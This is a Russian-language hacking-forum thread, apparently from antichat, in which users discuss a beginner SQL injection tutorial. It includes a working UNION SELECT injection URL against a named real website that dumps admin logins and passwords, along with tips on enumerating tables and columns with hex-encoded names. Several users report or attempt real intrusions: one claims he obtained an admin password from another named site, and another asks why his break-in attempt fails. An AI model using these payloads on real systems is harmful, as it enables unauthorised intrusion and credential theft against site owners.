Спасибо.

какая версия mysql, может это вообще не mysql и там другие правила, ?

)), не удивительно, а ты задумывался что будет в этом случае )). Если конвертить 0x5573657273 даже в hex то будет 307835353733363537323733, я уже даже не говорю что будет если это будет Hax.

P.S. намек: зачем хексить хекс... может лучше UNHEX(0x5573657273), а если по правде, то я вам не скажу за всю SQL, вся SQL слишком велика, но MySQL 3 по 5 обожают чистый хекс т.е. 0x5573657273, но в данном случае это не прокатит, по краней мере на моей памяти хекс работал только в where и в функциях

Версия 5.0.54

Ну методом научного тыка пытался что то сделать )).

Просто не могу понять как вывести значение столбца.

Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.

не получается получить строку из столбца passwd и все как только не извращался над ним.

J0cker при выборке данных из конкретной таблицы, нельзя писать имя таблици в ascii или hex

select column from 'имя_таблици_в_плавном_виде'

Так, давайте выведем все таблицы:

Я там нашёлcity_351.admin

Выведем колонки city_351.admin:

Вместо 0x61646d696e пишем название таблицы в HEX виде. HEX вид можно получить тут

Вот и всё, таким образом Вы можете выводить колонки таблиц.

Xоть я в этом деле не шарю, единственная статья в которой все понятно прочитал их около 10, но везде урезками, или фразами не понятные новечкам. Автору распект!!!

спасибо

Спасибо за статью,новачкам будет полезно...

И не только...

И не только новичкам. Я к примеру кое что новое узнал (мало правда, но всё же)

По-моему, бред подставлять в статье реальный адрес сайта. Это же надо было додуматься до такого...

Читайте лучше полный FAQ по SQL-inj.

Как ни старался, ни нашел ничего бредового. Наглядный пример и все.

Ну это без комментариев.

Зачем Вы пишет этот гуан?

Есть уже куча подобных материалов на эту тему, которые тоже гуан.

На _данном_форуме_, пожалуй, самый лучший материал был у нуля, к тому же в его теме было очень много дополнений.

Статьи нужно писать для того, чтобы донести до пользователя что то новое и интересное(ну или хотя бы просто интересное), а не для того, чтобы показать всем уровень своих знаний(который, судя по статье, ничтожен).

Подумайте над этим.

Ничего нового, уже много статей есть на эту тему, где всё хорошо разжевано.

Статьи нужно писать, чтобы донести до пользователя информацию. Новое и интересное - опционально.

Я хоть где нибудь говорил, что в моей статье есть что-то новое, оригинальное? Я просто описал основы понятным языком, на что и сделан упор.

Тупой копипаст другими словами. Дай асю, пару вопросов задам.. посмотрим на твои знания. В моё время кое кто именно так меня проверял =\

-PRIVAT- покажи мне, где я хоть раз утверждал, что отличный хекер и знаю об инъекциях чуть менее, чем все.

Асю не дам :Р

нормальная статья

еврейский шедевр!

я по этой статье научился всему.. теперь me ломаю телекоммуникационные сети и соц сети..

Весь бред в том, что админы сайта наверняка умеют пользоваться поисковиком или им подкинут ссылку на эту тему. Ты вообще понимаешь, что ты этим самым подставляешь ачат? К тому же, палишь и ленивых новичков, которые добросоветсно будут заходить по ссылкам, т.е. участвовать во взломе. Можно запросто их всех привлечь к ответственности, логов будет предостаточно. А ленивые - потому что не могут посмотеть нормальную статью от Dr.Z3r0 --> https://forum.antichat.net/thread43966.html.

логи не являються доказательством

понимаю, но приятного все равно мало.

Они сами решат, стоит переходить по ссылке или не стоит, не?

Новичку ее будет прочесть довольно сложно.

Если сложно -- значит не судьба, что поделать то?

Ноль расписал некоторые отросли этой "атаки" так сказать, "изнутри"(громко сказано, конечно, но примерно так). Вы же научили пользователя подставлять кавычки и все такое даже не объяснив как это происходит.

В Вашей статье нет ничего того, чего нету в остальных говно-статьях о скуль-инжектах. Так же, что о мне подсказывает, что Вы просто переписали своими словами статью нуля и сделали это не лучшим образом.

И не пытайтесь мне что то доказать, у Вас все равно не получится.

Хотел бы отметить, что для начала надо читать не статьи об инжектах, а книжки по скуле, чтоб хоть уметь работать с базой для начала. А на счет статьи, соглашусь с Еррорнео, это не стаья в которой рассказывается теория, а простенький пример использования, способный пробудить интерес. Но указание ссылки на сайт считаю не правильным. Для этих целей можно было зарегить домен и повесить на него сайт, на котором и показывать пример.

Не. Результат-то надо знать какой будет от этих команд. Где же ещё пробывать?!

Не новичку, а лентяю.

Ins3t, PvgValo +1

Каждый ответственен только за себя, он сам выбирает что ему делать.

И не стоит винить других в этом. Чтобы практиковаться можно и apache/mysql поднять у себя.

Я убит наповал этим аргументом.

Почему выводится ошибка после подстановки кавычки написал. Остальное просто понять из урла.

Я убит наповал этим аргументом. x2

Я, пожалуй, даже пытаться не буду

Статья гавно, для детей даунов, нолик и так описал как надо, с самого нуля, что да как, да нет же, надо ещё создать статью мол я такой же опупенный хакир как нолик!

FAQ для новичков по раскрутке скуль :3​

http://s003.radikal.ru/i203/1011/37/e58140a0d9d2t.jpg

Народ

я ввел из урока последнюю строку

http://www.td-vezdehod.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,group_concat(login ,0x3a,passw),20,21,22+from+AdminSite+--+

но не увидел ни логина ни пароля

а вообще статья хорошая для нубов как я

Я пошол в топик ачата где просто дают ссылки на сайты с SQL инъкциями

и почитав эту статью нашол пароль и логин от админки сайта

http://www.dovidkalutsk.com.ua/

Пробелы лишние сотри, которые форум вставляет)

Ну и нахера тогда писате статью,итак полно инфы,кто захочет,тот научиться,кто не захочет/не сможет значит не судьба,помню фразу чью-то давно "Неправильно заученный материал еще хуже незнания" мб как-то по другому,но смысл был таков.

Слова POST или cookie вам что-нибудь говорит?Боюсь,что нет

Вахаха,"можете вообще не думать,читая ету статью."

доо

О да,а квантовая физика идеальна для первоклассников,инфа 100%

Да ты что,в статье про это так много сказано,администраторы прям навалили кучу от счастья.

Вообщем статью стоило назвать "Что надо делать когда у вас есть стандартная скуля на 5 ветке mysql" - и то,целью стояло (ну я так понял) построить грамотную и понятную обсолютно любому статью,тут же ты просто введешь людей в заблуждение.

А еще,вот допустим новичок нарвался на mssql или oracle чтоже он будет делать?Или фильруется что-то,где обходы,ах боюсь предположить,что ты сам нехера не в теме.

Всем новичкам,кто очень хочет научиться и вникнуть в тему советую сделать следующее:

1.)Ни в коем случае не читать етот бред (это лишь совет,выбирать вам)

2.)Идти читать документации (ну или хотябы книжку какую-нибудь,где самые основы и нетолько)

3.)Идти читать статью от нуля (она неподалеку и прикреплена,если будет непонятно,то значит плохо прочитали документацию,либо не судьба)

4.)Ну и конечно же практиковаться,сначала на локалке,скачать денвер (ненадо изобретать велосипед) и поставить уязвимый скрипт,смотреть что да как.

Ну или прочитать енто и идти хекать тырнеты,незная что такое update\drop и так далее=\

P.S. Автор,не обижайся на меня,я лишь высказал свое мнение,надеюсь,что ты когда-нибудь скажешь сам c улыбкой "О боже,как я мог такое написать "

А у меня все получается до того когда тейблы выводятся и все. Конвертировал все в аси а при запросе выводит раз двадцать название тейбла.(user,user,user,user)

ТС, а чем тебя /thread43966.html не устраивает?

ЗЫ Вот она для новичков, а ты для скрипт кидисов написал

Уязвимость на том сайте была отфиксена еще когда я впервые прочел эту статью.

Хм, действительно пофиксили.

Блин...думал тут решится мой вопрос))

ребят вы чего друг у друга копипастите?))

это обычный копипаст просто своими словами.....

вот я не могу сделать все по инструкции... т .к у меня вылазит вот такая ошибочка,даже не ошибочка а просто вылазит вот такая штука :

1)Вот ссылка до изменения http://site.ru/index.php?f=stat&sid=2

2)вот ссылка в именении http://site.ru/index.php?f=stat&sid=2FROM news WHERE id='774'

3)Вот ссылка после изменения : http://site.ru/index.php?f=stat&sid=2FROM%20news%20WHERE%20id='77 4'

__________________________________________________ ___

Вот и обьсни мне пожалуйста,откуда тут взялись %20 ?? я уже 5-тые сутки не могу взломать этот сайт ;D